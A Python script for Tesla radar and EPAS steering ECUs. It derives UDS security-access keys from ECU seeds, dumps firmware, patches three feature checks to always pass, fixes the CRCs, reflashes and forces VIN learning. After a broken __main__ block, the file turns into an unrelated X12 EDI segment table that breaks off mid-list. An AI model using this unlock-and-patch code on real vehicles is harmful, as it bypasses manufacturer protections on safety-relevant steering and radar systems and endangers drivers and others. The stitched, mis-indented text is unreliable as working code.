FW_SIZE = FW_END_ADDR - FW_START_ADDR + 1  # byte count of the inclusive range
# load/entry address for the helper bootloader image
# NOTE(review): presumably RAM, passed to flash_bootloader() -- confirm against caller
BOOTLOADER_ADDR = 0x3ff7000
# Tesla UDS security-access constants
class ACCESS_TYPE_LEVEL_1(IntEnum):
    """UDS securityAccess sub-functions for the level-1 unlock:
    seed request 0x11, key response 0x12 (seed + 1, per the UDS convention)."""
    REQUEST_SEED = 0x11
    SEND_KEY = 0x12
def tesla_radar_security_access_algorithm(seeda, DEBUG=False):
    """
    Compute the Tesla radar UDS security-access key for a seed.

    seeda -- seed bytes as received from the ECU (interpreted big-endian)
    Returns the key as an int; callers pack it (e.g. struct.pack("!I", ...)).

    Derives a 4-bit amount from scattered seed bits, rotates the seed by it
    (direction chosen by seed bit 17), then combines the rotated value with
    the seed using an operation selected by two more seed bits.
    """
    seed = int.from_bytes(seeda, byteorder="big")
    # k4: 4 bits gathered from fixed positions in the seed
    k4 = ((seed >> 5) & 8) | ((seed >> 0xB) & 4) | ((seed >> 0x18) & 1) | ((seed >> 1) & 2)
    if DEBUG:
        print("k4=", hex(k4))
        print("seed&0x20000=", hex(seed & 0x20000))
    # k32: the 32-bit rotation of the seed by k4 bits
    if seed & 0x20000 == 0:
        k32 = (seed & ~(0xff << k4 & 0xFFFFFFFF)) << 0x20 - k4 & 0xFFFFFFFF | seed >> k4 & 0xFFFFFFFF
    else:
        k32 = (~(0xff << k4 & 0xFFFFFFFF) << 0x20 - k4 & seed & 0xFFFFFFFF) >> 0x20 - k4 & 0xFFFFFFFF | seed << k4 & 0xFFFFFFFF
    if DEBUG:
        print("k32=", hex(k32))
    # k2 selects the final mixing operation
    k2 = seed >> 4 & 2 | seed >> 0x1F
    if DEBUG:
        print("k2=", hex(k2))
    mixed = {0: k32 | seed, 1: k32 & seed, 2: k32 ^ seed}
    return mixed.get(k2, k32)
def tesla_epas_security_access_key(seed):
    """
    Compute the Tesla EPAS UDS security-access key for a seed.

    seed -- seed bytes from the ECU (zero-padded to 4 bytes, little-endian)
    Returns a 3-byte key assembled from nibbles of the final register state.
    """
    def lfsr_rounds(state, mask):
        # 32 rounds of an LFSR-style mix: the feedback bit is the XOR of
        # the low bits of state and mask; taps applied via 0x109028
        for _ in range(32):
            feedback = (state ^ mask) & 1
            mask >>= 1
            state >>= 1
            if feedback:
                state = (state | feedback << 0x17) ^ 0x109028
        return state

    initial_mask = struct.unpack('<I', seed.ljust(4, b'\x00'))[0] | 0x20000000
    key = lfsr_rounds(0xc541a9, initial_mask)
    key = lfsr_rounds(key, 0x55f222f9)
    # scatter the 24-bit result into 3 output bytes, nibble by nibble
    return bytes([
        (key & 0xff0) >> 4,
        (key & 0xf000) >> 8 | (key & 0xf00000) >> 20,
        (key & 0xf0000) >> 16 | (key & 0xf) << 4,
    ])
def wait(uds_client):
    """
    Poll the ECU with testerPresent until it answers (e.g. after a reset).

    Temporarily drops the UDS timeout to 0.1s so each probe fails fast.
    The caller's timeout is now restored on ALL paths -- the previous code
    leaked the 0.1s timeout when all 10 probes timed out.

    Raises Exception("reboot failed!") after 10 unanswered probes.
    """
    print(" wait .", end="")
    prev_timeout = uds_client.timeout
    uds_client.timeout = 0.1
    try:
        for _ in range(10):
            try:
                uds_client.tester_present()
                print("")
                return
            except MessageTimeoutError:
                print(".", end="")
        raise Exception("reboot failed!")
    finally:
        # always restore the caller's timeout, even when we give up
        uds_client.timeout = prev_timeout
def extract_firmware(uds_client, start_addr, end_addr):
    """
    Dump the radar firmware between start_addr and end_addr (inclusive).

    Unlocks the ECU via the seed/key security-access handshake, then reads
    memory in 128-byte chunks.  Returns the firmware image as bytes.
    """
    print("start extended diagnostic session ...")
    uds_client.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
    print("request security access seed ...")
    seed = uds_client.security_access(ACCESS_TYPE.REQUEST_SEED)
    print(f" seed: 0x{seed.hex()}")
    print("send security access key ...")
    # pack the int key into 4 big-endian bytes, consistent with vin_learn();
    # the previous code passed the bare int, and int has no .hex() method
    key = struct.pack("!I", tesla_radar_security_access_algorithm(seed))
    print(f" key: 0x{key.hex()}")
    uds_client.security_access(ACCESS_TYPE.SEND_KEY, key)
    print("extract firmware ...")
    print(f" start addr: {hex(start_addr)}")
    print(f" end addr: {hex(end_addr)}")
    chunk_size = 128
    chunks = []
    for addr in tqdm(range(start_addr, end_addr + 1, chunk_size)):
        dat = uds_client.read_memory_by_address(addr, chunk_size)
        assert len(dat) == chunk_size, f"expected {chunk_size} bytes but received {len(dat)} bytes starting at address {addr}"
        chunks.append(dat)
    # join once instead of the previous quadratic fw += dat accumulation
    return b"".join(chunks)
def update_checksums(fw, offset, restore=False):
    """
    Recompute the two CRC32 checksums embedded in the firmware image.

    Each record at flash address 0x79c0 / 0x79d0 holds three little-endian
    u32s: <start_addr, end_addr, crc32>, where the CRC covers
    fw[start-offset : end-offset+1].  Returns the firmware with both CRC
    fields rewritten; the progress print is skipped when restore is True.
    """
    for record_addr in (0x79c0, 0x79d0):
        idx = record_addr - offset
        assert idx >= 0
        start = struct.unpack('<I', fw[idx:idx+4])[0]
        assert start-offset >= 0
        end = struct.unpack('<I', fw[idx+4:idx+8])[0]
        assert start < end, f"start addr {start} not less than end addr {end}"
        assert end-offset < len(fw), f"end addr {end} not inside firmware range"
        crc_value = binascii.crc32(fw[start-offset:end-offset+1])
        checksum_bytes = struct.pack("<I", crc_value)
        if not restore:
            note = '(no change)' if checksum_bytes == fw[idx+8:idx+12] else '(change)'
            print(f" {hex(start)}-{hex(end)} : {hex(crc_value)} {note}")
        fw = fw[:idx+8] + checksum_bytes + fw[idx+12:]
    return fw
def patch_firmware(fw, offset, restore=False):
    """
    Apply (or, with restore=True, undo) the three firmware patches.

    Each patch makes a feature check load the constant 1 instead of
    extracting the signal from its CAN message.  In restore mode, locations
    that are not currently patched are skipped; patched ones are returned
    to their stock bytes.  Returns the modified firmware.
    """
    mods = [
        # load 1 instead of extracting EPB_epasEACAllow (message must still be present on bus)
        [0x031750, b"\x80\xff\x74\x2b", b"\x20\x56\x01\x00"],
        # load 1 instead of extracting GTW_epasControlType (message must still be present on bus)
        [0x031892, b"\x80\xff\x32\x2a", b"\x20\x56\x01\x00"],
        # load 1 instead of extracting GTW_epasLDWEnable (message must still be present on bus)
        [0x031974, b"\x80\xff\x50\x29", b"\x20\x56\x01\x00"],
    ]
    for addr, stock_bytes, patched_bytes in mods:
        idx = addr - offset
        assert idx >= 0
        if restore:
            # skip locations that do not carry the patch
            if fw[idx:idx+len(stock_bytes)] != patched_bytes:
                continue
            # swap roles: we now expect the patched bytes and write stock ones
            stock_bytes, patched_bytes = patched_bytes, stock_bytes
        else:
            print(f" {hex(addr)} : 0x{fw[idx:idx+len(stock_bytes)].hex()} -> 0x{patched_bytes.hex()}")
        assert len(stock_bytes) == len(patched_bytes), f"{len(stock_bytes)} != {len(patched_bytes)}"
        assert fw[idx:idx+len(stock_bytes)] == stock_bytes, f"0x{fw[idx:idx+len(stock_bytes)].hex()} != 0x{stock_bytes.hex()}"
        fw = fw[:idx] + patched_bytes + fw[idx+len(patched_bytes):]
    return fw
def flash_bootloader(uds_client, bootloader_filename, start_addr):
    """
    Download the helper bootloader image to the ECU and jump to it.

    Reads the image from bootloader_filename, enters the programming
    session, unlocks the ECU, transfers the image to start_addr and starts
    it via routineControl 0x0301.
    """
    print("read bootloader ...")
    with open(bootloader_filename, "rb") as f:
        fw = f.read()
    fw_len = len(fw)
    end_addr = start_addr + fw_len - 1
    print("start programming session ...")
    uds_client.diagnostic_session_control(SESSION_TYPE.PROGRAMMING)
    wait(uds_client)
    print("request security access seed ...")
    seed = uds_client.security_access(ACCESS_TYPE.REQUEST_SEED)
    print(f" seed: 0x{seed.hex()}")
    print("send security access key ...")
    # pack the int key into 4 big-endian bytes, consistent with vin_learn();
    # the previous code passed the bare int, and int has no .hex() method
    key = struct.pack("!I", tesla_radar_security_access_algorithm(seed))
    print(f" key: 0x{key.hex()}")
    uds_client.security_access(ACCESS_TYPE.SEND_KEY, key)
    print("request download ...")
    print(f" start addr: {hex(start_addr)}")
    print(f" end addr: {hex(end_addr)}")
    print(f" data length: {hex(fw_len)}")
    block_size = uds_client.request_download(start_addr, fw_len)
    print("transfer data ...")
    print(f" block size: {block_size}")
    # each transferData frame carries block_size - 2 payload bytes;
    # the block sequence counter wraps at 0xFF
    chunk_size = block_size - 2
    cnt = 0
    for i in tqdm(range(0, fw_len, chunk_size)):
        cnt += 1
        uds_client.transfer_data(cnt & 0xFF, fw[i:i+chunk_size])
    print("request transfer exit ...")
    uds_client.request_transfer_exit()
    print("enter bootloader ...")
    uds_client.routine_control(ROUTINE_CONTROL_TYPE.START, 0x0301, struct.pack(">I", start_addr))
def flash_firmware(uds_client, fw_slice, start_addr, end_addr):
    """
    Erase, reflash and verify the firmware range [start_addr, end_addr].

    fw_slice must be exactly end_addr - start_addr + 1 bytes.  After the
    transfer the ECU is hard-reset; the function then re-unlocks it and
    runs the 'check dependencies' routine (0xDC03) to validate the image.
    """
    slice_len = end_addr - start_addr + 1
    assert slice_len == len(fw_slice)
    start_and_length = struct.pack('>II', start_addr, slice_len)
    print("erase memory ...")
    print(f" start addr: {hex(start_addr)}")
    print(f" end addr: {hex(end_addr)}")
    print(f" data length: {hex(slice_len)}")
    uds_client.routine_control(ROUTINE_CONTROL_TYPE.START, ROUTINE_IDENTIFIER_TYPE.ERASE_MEMORY, start_and_length)
    print("request download ...")
    print(f" start addr: {hex(start_addr)}")
    print(f" end addr: {hex(end_addr)}")
    print(f" data length: {hex(slice_len)}")
    block_size = uds_client.request_download(start_addr, slice_len)
    print("transfer data ...")
    print(f" block size: {block_size}")
    # each transferData frame carries block_size - 2 payload bytes;
    # the block sequence counter wraps at 0xFF
    chunk_size = block_size - 2
    cnt = 0
    for i in tqdm(range(0, slice_len, chunk_size)):
        cnt += 1
        uds_client.transfer_data(cnt & 0xFF, fw_slice[i:i+chunk_size])
    print("request transfer exit ...")
    uds_client.request_transfer_exit()
    print("reset ...")
    wait(uds_client)
    try:
        # 0x80 sets the suppress-positive-response bit on the reset request
        uds_client.ecu_reset(RESET_TYPE.HARD | 0x80)
    except MessageTimeoutError:
        # supress response bit set, so timeout expected
        # (timeout is used to wait for reboot to complete)
        pass
    wait(uds_client)
    print("start extended diagnostic session ...")
    uds_client.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
    print("request security access seed ...")
    seed = uds_client.security_access(ACCESS_TYPE.REQUEST_SEED)
    print(f" seed: 0x{seed.hex()}")
    print("send security access key ...")
    # pack the int key into 4 big-endian bytes, consistent with vin_learn();
    # the previous code passed the bare int, and int has no .hex() method
    key = struct.pack("!I", tesla_radar_security_access_algorithm(seed))
    print(f" key: 0x{key.hex()}")
    uds_client.security_access(ACCESS_TYPE.SEND_KEY, key)
    print("check dependencies ...")
    uds_client.routine_control(ROUTINE_CONTROL_TYPE.START, 0xDC03)
    print("complete!")
def vin_learn(udcli):
    """
    Put the radar into VIN-learn mode so it adopts the car's VIN.

    Starts routine 2563 (0x0A03), then repeatedly polls the STOP routine
    (up to 3 attempts per round, 2s apart) until two rounds succeed, and
    finally requests the routine results.

    Raises NegativeResponseError if all 3 attempts of a round fail.
    """
    print("\n[START DIAGNOSTIC SESSION]")
    udcli.tester_present()
    udcli.diagnostic_session_control(SESSION_TYPE.DEFAULT)
    udcli.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
    wait(udcli)
    print("request security access seed ...")
    # NOTE(review): uses the level-1 sub-functions (0x11/0x12), unlike the
    # flashing helpers above which use the plain ACCESS_TYPE pair
    seed = udcli.security_access(ACCESS_TYPE_LEVEL_1.REQUEST_SEED)
    print(f" seed: 0x{seed.hex()}")
    print("send security access key ...")
    # the key algorithm returns an int; pack it to 4 big-endian bytes
    key = struct.pack("!I",tesla_radar_security_access_algorithm(seed))
    udcli.security_access(ACCESS_TYPE_LEVEL_1.SEND_KEY, key)
    print("Starting VIN learn...")
    output = udcli.routine_control(ROUTINE_CONTROL_TYPE.START, 2563)  # routine 2563 = 0x0A03
    ns = 0      # completed STOP rounds so far
    nsmax = 2   # rounds required before requesting results
    while ns < nsmax:
        for i in range(3):
            time.sleep(2)
            try:
                output = udcli.routine_control(ROUTINE_CONTROL_TYPE.STOP, 2563)
            except NegativeResponseError as e:
                print(('Failed to stop vin learning on attempt #{0}. ({1})').format(i + 1,_negative_response_codes[e.error_code]))
                if i == 2:
                    # third consecutive failure in this round: give up
                    raise
            else:
                # STOP accepted: round complete; fetch results once enough
                # rounds have succeeded, then leave the retry loop
                ns += 1
                if ns >= nsmax:
                    output = udcli.routine_control(ROUTINE_CONTROL_TYPE.REQUEST_RESULTS, 2563)
                break
    print("VIN learn complete! [",output,"]")
def read_values_from_radar(udcli):
    """
    Print the radar's identity and alignment values, then scan and print
    the whole 0xF100-0xF2FE data-identifier range.
    """
    print("\n[START DIAGNOSTIC SESSION]")
    udcli.diagnostic_session_control(SESSION_TYPE.DEFAULT)
    udcli.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
    print("reading VIN from radar...")
    # known identifiers and their display labels, printed in this order
    known_fields = [
        (DATA_IDENTIFIER_TYPE.VIN, "new VIN"),
        (0xA022, "plant mode"),
        (0xF014, "board part #"),
        (0xF015, "board ser #"),
        (0xFC01, "Active alignment horizontal angle"),
        (0x508, "Active Alignment Horizontal Screw"),
        (0x505, "Active Alignment State"),
        (0xFC02, "Active Alignment Vertical Angle"),
        (0x507, "Active Alignment Vertical Screw"),
        (0x506, "Active Alignment Operation"),
        (0x50A, "Service Drive Alignment State"),
        (0x509, "Service Drive Alignment Status"),
    ]
    for identifier, label in known_fields:
        value = udcli.read_data_by_identifier(identifier)
        print("{}: {} [{}]".format(label, value.decode("utf-8"), binascii.hexlify(value)))
    print("reading variables from radar...")
    for identifier in range(0xF100, 0xF2FF):
        try:
            data = udcli.read_data_by_identifier(identifier)
            label = ""
            try:
                # annotate identifiers that have a symbolic UDS name
                label = " [" + DATA_IDENTIFIER_TYPE(identifier).name + "]"
            except ValueError:
                pass
            print("{}:{} {} {}".format(hex(identifier), label, binascii.hexlify(data), ""))
        except NegativeResponseError as e:
            # 0x31 (requestOutOfRange) just means the identifier is unused
            if e.error_code != 0x31:
                print("{}: {}".format(hex(identifier), e))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--extract-only', action='store_true', help='extract the firmware (do not flash)')
parser.add_argument('--extract-params', action='store_true', help='extract the programmed params from radar')
parser.add_argument('--vin-learn', action='store_true', help='switch radar in programming mode to learn VIN')
parser.add_argument('--restore', action='store_true', help='flash firmware without modification')
parser.add_argument('--debug', action='store_true', help='print additional debug messages')
parser.add_argument('--bootloader', type=str, default="./radarfw.bin", help='path to firmware file')
parser.add_argument('--can-addr', type=int, default=0x641, help='TX CAN address for UDS') #receives on 0x671, answers on 0x681 - UDS_radcRequest 1649 - RADC_udsResponse 1665
parser.add_argument('--can-bus', type=int, default=1, help='CAN bus number (zero based)')
args = parser.parse_args()
safetyParam | |
['DAD02', 'M', 1,'AN'],
['DAD03', 'M', (6,6),'DT'],
['DAD04', 'C', (6,6),'DT'],
['DAD05', 'C', (10,10),'AN'],
['DAD06', 'C', (9,9),'AN'],
['DAD07', 'C', 2,'AN'],
['DAD08', 'C', 15,'R'],
['DAD09', 'C', 30,'AN'],
['DAD10', 'C', 30,'AN'],
['DAD11', 'C', (2,2),'AN'],
['DAD12', 'C', (3,12),'AN'],
['DAD13', 'C', 35,'AN'],
['DAD14', 'C', 3,'R'],
['DAD15', 'C', 1,'AN'],
],
'DAI': [
['BOTSID', 'M', 3,'AN'],
['DAI01', 'M', 1,'AN'],
['DAI02', 'M', 6,'AN'],
['DAI03', 'C', 6,'R'],
],
'DAM': [
['BOTSID', 'M', 3,'AN'],
['DAM01', 'C', (2,2),'AN'],
['DAM02', 'C', (2,2),'AN'],
['DAM03', 'C', 15,'N2'],
['DAM04', 'C', (3,3),'AN'],
['DAM05', 'C', (2,2),'AN'],
['DAM06', 'C', (2,2),'AN'],
['DAM07', 'C', 15,'N2'],
['DAM08', 'C', (2,2),'AN'],
['DAM09', 'C', (2,2),'AN'],
['DAM10', 'C', 15,'N2'],
['DAM11', 'C', (2,2),'AN'],
['DAM12', 'C', (2,2),'AN'],
['DAM13', 'C', 15,'N2'],
['DAM14', 'C', (2,2),'AN'],
['DAM15', 'C', (2,2),'AN'],
['DAM16', 'C', 15,'N2'],
],
'DB': [
['BOTSID', 'M', 3,'AN'],
['DB01', 'M', (2,3),'AN'],
['DB02', 'M', 35,'AN'],
['DB03', 'M', 15,'R'],
['DB04', 'C', 15,'R'],
['DB05', 'C', 15,'R'],
['DB06', 'C', 1,'AN'],
],
'DD': [
['BOTSID', 'M', 3,'AN'],
['DD01', 'C', 20,'AN'],
['DD02', 'C', 3,'AN'],
['DD03', 'C', (2,2),'AN'],
['DD04', 'C', 30,'AN'],
['DD05', 'C', 20,'AN'],
['DD06', 'C', 3,'AN'],
['DD07', 'C', 15,'R'],
['DD08', 'C', 1,'AN'],
['DD09', 'C', 20,'AN'],
['DD10', 'C', 3,'AN'],
],
'DDI': [
['BOTSID', 'M', 3,'AN'],
['DDI01', 'M', 80,'AN'],
],
'DEF': [
['BOTSID', 'M', 3,'AN'],
['DEF01', 'M', 2,'AN'],
['DEF02', 'M', (2,3),'AN'],
['DEF03', 'M', 35,'AN'],
['DEF04', 'C', 2,'AN'],
],
'DEG': [
['BOTSID', 'M', 3,'AN'],
['DEG01', 'M', (3,3),'AN'],
['DEG02', 'C', (2,3),'AN'],
['DEG03', 'C', 35,'AN'],
['DEG04', 'C', 60,'AN'],
['DEG05', 'C', (3,3),'AN'],
],
'DEP': [
['BOTSID', 'M', 3,'AN'],
['DEP01', 'M', 30,'AN'],
['DEP02', 'M', (6,6),'DT'],
['DEP03', 'C', (4,8),'TM'],
['DEP04', 'C', 30,'AN'],
['DEP05', 'M', (2,2),'AN'],
['DEP06', 'M', (3,12),'AN'],
['DEP07', 'C', (2,2),'AN'],
['DEP08', 'C', 35,'AN'],
],
'DFI': [
['BOTSID', 'M', 3,'AN'],
['DFI01', 'M', (3,3),'AN'],
['DFI02', 'C', 2,'AN'],
['DFI03', 'C', 1,'AN'],
['DFI04', 'C', 1,'AN'],
],
'DG1': [
['BOTSID', 'M', 3,'AN'],
['DG101', 'M', 4,'AN'],
['DG102', 'M', 10,'AN'],
['DG103', 'M', 12,'AN'],
['DG104', 'C', 30,'AN'],
['DG105', 'M', 4,'AN'],
['DG106', 'M', (6,6),'DT'],
['DG107', 'M', (6,6),'DT'],
['DG108', 'M', 9,'N2'],
],
'DH': [
['BOTSID', 'M', 3,'AN'],
['DH01', 'M', 2,'AN'],
['DH02', 'M', (4,8),'TM'],
['DH03', 'M', (4,8),'TM'],
],
'DIS': [
['BOTSID', 'M', 3,'AN'],
['DIS01', 'M', (3,3),'AN'],
['DIS02', 'M', (2,2),'AN'],
['DIS03', 'M', 10,'R'],
['DIS04', 'M', (2,3),'AN'],
['DIS05', 'M', 10,'R'],
['DIS06', 'C', 10,'R'],
],
'DK': [
['BOTSID', 'M', 3,'AN'],
['DK01', 'M', (2,4),'AN'],
['DK02', 'M', 7,'AN'],
['DK03', 'M', 11,'AN'],
['DK04', 'M', 4,'R'],
['DK05', 'M', 1,'AN'],
['DK06', 'M', 1,'AN'],
['DK07', 'C', (6,6),'DT'],
['DK08', 'C', (6,6),'DT'],
['DK09', 'C', (2,2),'AN'],
],
'DLV': [
['BOTSID', 'M', 3,'AN'],
['DLV01', 'M', 9,'R'],
['DLV02', 'M', (2,2),'AN'],
['DLV03', 'M', 30,'AN'],
],
'DM': [
['BOTSID', 'M', 3,'AN'],
['DM01', 'M', 1,'AN'],
['DM02', 'M', (2,2),'AN'],
['DM03', 'C', 1,'AN'],
['DM04', 'C', (4,8),'TM'],
['DM05', 'M', 3,'R'],
['DM06', 'M', 2,'AN'],
['DM07', 'M', 3,'R'],
['DM08', 'M', 7,'R'],
['DM09', 'C', 2,'AN'],
['DM10', 'C', 1,'AN'],
['DM11', 'C', 1,'AN'],
['DM12', 'C', 2,'AN'],
['DM13', 'C', 3,'R'],
['DM14', 'C', 3,'R'],
['DM15', 'C', 7,'R'],
['DM16', 'C', 3,'R'],
['DM17', 'C', 7,'R'],
['DM18', 'C', 3,'R'],
['DM19', 'C', 7,'R'],
['DM20', 'C', 3,'R'],
['DM21', 'C', 7,'R'],
],
'DMA': [
['BOTSID', 'M', 3,'AN'],
['DMA01', 'C', 30,'AN'],
['DMA02', 'C', (2,2),'AN'],
['DMA03', 'C', 30,'AN'],
['DMA04', 'C', (2,2),'AN'],
['DMA05', 'C', 1,'AN'],
],
'DMG': [
['BOTSID', 'M', 3,'AN'],
['DMG01', 'C', (2,3),'AN'],
['DMG02', 'C', 35,'AN'],
['DMG03', 'C', 1,'AN'],
['DMG04', 'C', 1,'AN'],
['DMG05', 'C', 1,'AN'],
['DMG06', 'C', 2,'AN'],
['DMG07', 'C', (2,3),'AN'],
['DMG08', 'C', 2,'AN'],
],
'DMI': [
['BOTSID', 'M', 3,'AN'],
['DMI01', 'M', 1,'AN'],
['DMI02', 'M', 6,'AN'],
['DMI03', 'C', 35,'AN'],
['DMI04', 'C', 35,'AN'],
['DMI05', 'C', 35,'AN'],
['DMI06', 'C', (2,30),'AN'],
['DMI07', 'C', (2,2),'AN'],
['DMI08', 'C', (3,9),'AN'],
['DMI09', 'C', (2,3),'AN'],
['DMI10', 'C', (2,2),'AN'],
['DMI11', 'C', 80,'AN'],
['DMI12', 'C', 6,'R'],
],
'DN': [
['BOTSID', 'M', 3,'AN'],
['DN01', 'M', (2,2),'AN'],
['DN02', 'M', (6,6),'DT'],
['DN03', 'C', (3,3),'AN'],
['DN04', 'C', (3,3),'AN'],
],
'DN1': [
['BOTSID', 'M', 3,'AN'],
['DN101', 'C', 15,'R'],
['DN102', 'C', 15,'R'],
['DN103', 'C', 1,'AN'],
['DN104', 'C', 80,'AN'],
],
'DN2': [
['BOTSID', 'M', 3,'AN'],
['DN201', 'M', 30,'AN'],
['DN202', 'M', 2,'AN'],
['DN203', 'C', 15,'R'],
],
'DOS': [
['BOTSID', 'M', 3,'AN'],
['DOS01', 'M', (2,2),'AN'],
['DOS02', 'C', 15,'R'],
['DOS03', 'C', 10,'R'],
['DOS04', 'C', 15,'R'],
['DOS05', 'C', 10,'R'],
['DOS06', 'C', (2,2),'AN'],
['DOS07', 'C', 80,'AN'],
],
'DR': [
['BOTSID', 'M', 3,'AN'],
['DR01', 'M', (6,6),'DT'],
['DR02', 'M', (2,4),'AN'],
['DR03', 'M', 7,'AN'],
['DR04', 'M', 11,'AN'],
['DR05', 'C', 4,'R'],
['DR06', 'C', 11,'AN'],
],
'DSB': [
['BOTSID', 'M', 3,'AN'],
['DSB01', 'M', 1,'AN'],
['DSB02', 'C', 15,'R'],
['DSB03', 'C', (4,6),'AN'],
['DSB04', 'C', 1,'AN'],
['DSB05', 'C', 2,'AN'],
['DSB06', 'C', 15,'R'],
['DSB07', 'C', (2,2),'AN'],
['DSB08', 'C', 15,'AN'],
],
'DTM': [
['BOTSID', 'M', 3,'AN'],
['DTM01', 'M', (3,3),'AN'],
['DTM02', 'C', (6,6),'DT'],
['DTM03', 'C', (4,8),'TM'],
['DTM04', 'C', (2,2),'AN'],
['DTM05', 'C', (2,2),'R'],
['DTM06', 'C', (2,3),'AN'],
['DTM07', 'C', 35,'AN'],
],
'DTP': [
['BOTSID', 'M', 3,'AN'],
['DTP01', 'M', (3,3),'AN'],
['DTP02', 'M', (2,3),'AN'],
['DTP03', 'M', 35,'AN'],
],
'DVI': [
['BOTSID', 'M', 3,'AN'],
['DVI01', 'C', (3,3),'AN'],
['DVI02', 'C', 14,'R'],
['DVI03', 'C', (3,3),'AN'],
['DVI04', 'C', (2,3),'AN'],
['DVI05', 'C', 35,'AN'],
['DVI06', 'C', 35,'AN'],
['DVI07', 'C', 15,'R'],
['DVI08', 'C', 30,'AN'],
['DVI09', 'C', (2,2),'AN'],
['DVI10', 'C', (2,3),'AN'],
['DVI11', 'C', 35,'AN'],
['DVI12', 'C', (2,2),'AN'],
['DVI13', 'C', 1,'AN'],
],
'E01': [
['BOTSID', 'M', 3,'AN'],
['E0101', 'M', 1,'AN'],
['E0102', 'M', 1,'AN'],
['E0103', 'M', 12,'AN'],
['E0104', 'M', 1,'AN'],
],
'E03': [
['BOTSID', 'M', 3,'AN'],
['E0301', 'M', 1,'AN'],
['E0302', 'M', 1,'AN'],
['E0303', 'M', (2,3),'AN'],
['E0304', 'M', 1,'AN'],
['E0305', 'M', 1,'AN'],
['E0306', 'M', 7,'R'],
['E0307', 'C', 6,'R'],
],
'E1': [
['BOTSID', 'M', 3,'AN'],
['E101', 'M', (2,30),'AN'],
['E102', 'C', 2,'AN'],
['E103', 'C', (2,17),'AN'],
],
'E10': [
['BOTSID', 'M', 3,'AN'],
['E1001', 'M', 1,'AN'],
['E1002', 'M', (3,3),'AN'],
['E1003', 'M', (2,2),'AN'],
['E1004', 'M', 80,'AN'],
['E1005', 'C', 6,'R'],
],
'E13': [
['BOTSID', 'M', 3,'AN'],
['E1301', 'M', 1,'AN'],
['E1302', 'M', 6,'R'],
['E1303', 'C', 1,'AN'],
['E1304', 'C', (2,3),'AN'],
['E1305', 'C', 1,'AN'],
['E1306', 'C', 7,'R'],
['E1307', 'C', (2,4),'AN'],
['E1308', 'C', 7,'R'],
['E1309', 'C', 1,'R'],
['E1310', 'C', 6,'R'],
],
'E20': [
['BOTSID', 'M', 3,'AN'],
['E2001', 'M', 1,'AN'],
['E2002', 'M', (2,3),'AN'],
['E2003', 'C', 80,'AN'],
['E2004', 'C', 6,'R'],
],
'E22': [
['BOTSID', 'M', 3,'AN'],
['E2201', 'M', 1,'AN'],
['E2202', 'M', 1,'AN'],
['E2203', 'M', 2,'R'],
['E2204', 'C', 2,'R'],
['E2205', 'C', 2,'R'],
['E2206', 'C', 2,'R'],
['E2207', 'C', 2,'R'],
['E2208', 'C', 2,'R'],
['E2209', 'C', 2,'R'],
['E2210', 'C', 2,'R'],
['E2211', 'C', 2,'R'],
['E2212', 'C', 2,'R'],
],
'E24': [
['BOTSID', 'M', 3,'AN'],
['E2401', 'M', 1,'AN'],
['E2402', 'M', 2,'R'],
['E2403', 'M', 4,'R'],
['E2404', 'M', 1,'AN'],
['E2405', 'C', 1,'AN'],
['E2406', 'C', 6,'R'],
],
'E26': [
['BOTSID', 'M', 3,'AN'],
['E2601', 'M', 1,'AN'],
['E2602', 'M', 2,'R'],
['E2603', 'M', 4,'R'],
['E2604', 'M', 1,'AN'],
['E2605', 'C', 1,'AN'],
['E2606', 'C', 6,'R'],
],
'E30': [
['BOTSID', 'M', 3,'AN'],
['E3001', 'M', 1,'AN'],
['E3002', 'M', 4,'R'],
['E3003', 'M', 2,'AN'],
['E3004', 'M', 2,'R'],
['E3005', 'M', 7,'R'],
['E3006', 'C', 80,'AN'],
['E3007', 'C', 6,'R'],
],
'E34': [
['BOTSID', 'M', 3,'AN'],
['E3401', 'M', 1,'AN'],
['E3402', 'M', 8,'AN'],
['E3403', 'C', 80,'AN'],
['E3404', 'M', 80,'AN'],
],
'E4': [
['BOTSID', 'M', 3,'AN'],
['E401', 'M', (2,30),'AN'],
['E402', 'M', (2,2),'AN'],
['E403', 'C', (3,9),'AN'],
['E404', 'C', (2,3),'AN'],
],
'E40': [
['BOTSID', 'M', 3,'AN'],
['E4001', 'M', 1,'AN'],
['E4002', 'M', 6,'R'],
['E4003', 'M', (3,3),'AN'],
['E4004', 'C', 11,'AN'],
],
'E5': [
['BOTSID', 'M', 3,'AN'],
['E501', 'M', (2,4),'AN'],
['E502', 'M', 2,'AN'],
['E503', 'C', (2,30),'AN'],
['E504', 'C', (6,9),'AN'],
],
'E6': [
['BOTSID', 'M', 3,'AN'],
['E601', 'M', 4,'AN'],
['E602', 'M', 10,'AN'],
['E603', 'M', (2,30),'AN'],
['E604', 'C', (6,9),'AN'],
['E605', 'M', (2,4),'AN'],
['E606', 'C', (2,4),'AN'],
['E607', 'C', 16,'AN'],
['E608', 'C', (4,4),'AN'],
['E609', 'M', 2,'AN'],
],
'E7': [
['BOTSID', 'M', 3,'AN'],
['E701', 'C', (2,30),'AN'],
['E702', 'C', (2,2),'AN'],
['E703', 'C', (6,9),'AN'],
['E704', 'C', (2,2),'AN'],
['E705', 'C', (6,6),'DT'],
['E706', 'C', (4,8),'TM'],
],
'E8': [
['BOTSID', 'M', 3,'AN'],
['E801', 'C', 12,'AN'],
['E802', 'C', 2,'AN'],
],
'EA': [
['BOTSID', 'M', 3,'AN'],
['EA01', 'M', (2,3),'AN'],
['EA02', 'C', [
['EA02.01', 'M', (2,2),'AN'],
['EA02.02', 'C', 15,'R'],
['EA02.03', 'C', 10,'R'],
['EA02.04', 'C', (2,2),'AN'],
['EA02.05', 'C', 15,'R'],
['EA02.06', 'C', 10,'R'],
['EA02.07', 'C', (2,2),'AN'],
['EA02.08', 'C', 15,'R'],
['EA02.09', 'C', 10,'R'],
['EA02.10', 'C', (2,2),'AN'],
['EA02.11', 'C', 15,'R'],
['EA02.12', 'C', 10,'R'],
['EA02.13', 'C', (2,2),'AN'],
['EA02.14', 'C', 15,'R'],
['EA02.15', 'C', 10,'R'],
]],
['EA03', 'C', 15,'R'],
],
'EB': [
['BOTSID', 'M', 3,'AN'],
['EB01', 'M', 2,'AN'],
['EB02', 'C', (3,3),'AN'],
['EB03', 'C', 2,'AN'],
['EB04', 'C', 3,'AN'],
